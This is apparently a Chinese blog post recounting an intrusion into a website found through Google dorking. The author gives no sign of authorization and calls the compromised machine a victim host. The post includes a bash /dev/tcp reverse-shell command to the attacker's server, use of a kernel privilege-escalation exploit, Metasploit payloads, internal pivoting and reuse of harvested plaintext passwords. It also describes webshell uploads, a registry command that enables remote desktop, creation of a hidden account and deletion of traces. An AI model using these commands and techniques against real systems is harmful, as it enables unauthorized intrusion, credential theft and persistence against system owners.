記一次滲透測試實戰記錄

0x01 突破邊界拿下shell

周末在家閑著沒事突然就想搞事情了，然后使用Google hack語法輸入批量搜索可能存在上傳點的網站，試了好幾個最后找到一個可利用的上傳點。

inurl:xxx.xxx.xxx/upload

注：涉及敏感信息，圖片僅供參考，具體內容自行填充。

0x02 反彈shell&提權

Linux下需要把shell反彈出來以方便我們操作，但是目標主機上既沒有nc也沒有python，查詢相關資料后嘗試了一下利用bash彈shell。

需要一臺公網服務器，使用命令bash -i >& /dev/tcp/your ip/1234 0>&1，公網服務器使用命令nc -lvp 1234監聽1234端口。

現在shell已經反彈出來了，使用id命令查看當前權限，發現僅為Apache，使用-uname -a 查看內核版本，發現服務器內核版本為2.6.31.5-127.fc12.1686。

在exploit-db中搜索此版本的相關漏洞，經過多次嘗試，發現了下面這個exp來提升權限。

Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Local Privilege Escalation

然而問題又來了，目標主機上沒有gcc，怎么辦？只能撞撞運氣嘗試在本地編譯好，再傳到目標主機上去執行。

本地編譯好exp后傳到目標主機TMP路徑下，執行命令 chmod 777 a 賦予exp執行權限，然后執行 ./a 獲取到root權限。

0x03 橫向滲透擼內網

發現目標主機有內網環境，個人比較喜歡用msf，于是生成了個msf木馬上傳執行獲取到一個meterpreter shell。

這里需要注意的是生成木馬時LHOST填你的服務器公網ip，設置msf監聽時LHOST需要填你服務器的內網ip。

meterpreter shell執行run autoroute -s 10.1.1.0/24添加路由掃內網445，發現一臺內網機器存在ms17010，但是session彈不回來，尷尬。

變換思路在邊界服務器上尋找有價值的可利用信息，最后發現了幾個password.txt和一個批量更新密碼的腳本，找到一個長得像管理員的密碼，這里不得不說一下在內網滲透中信息收集的重要性，這個密碼簡直太給力了。

因為是內網，所以得用代理工具把本機代理進去，這里我用的是reGeorg-master，上傳tunnel.nosocket.php到網站目錄下，配合Proxifier進行全局代理（Linux下用proxychains）。用這個密碼登錄上了受害主機的ssh，ssh都拿到了，接下來把該刪掉的東西都刪掉。

掃描內網機器10.1.1.17發現開了ftp，用上面那個密碼登錄進去了，就是這么巧。然后ftp傳馬，先傳了一個大馬。結果發現PHP版本太老了，然后上了個小馬，菜刀連接，直接system權限。

發現沒開3389，使用命令

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

一鍵開啟遠程桌面，建立隱藏賬戶，成功連入遠程桌面。

0x04 寫在后面的話

第一次從外網滲透到內網，盯了三天終于擼下一臺，感覺這個內網還有的擼，有時間再繼續搞。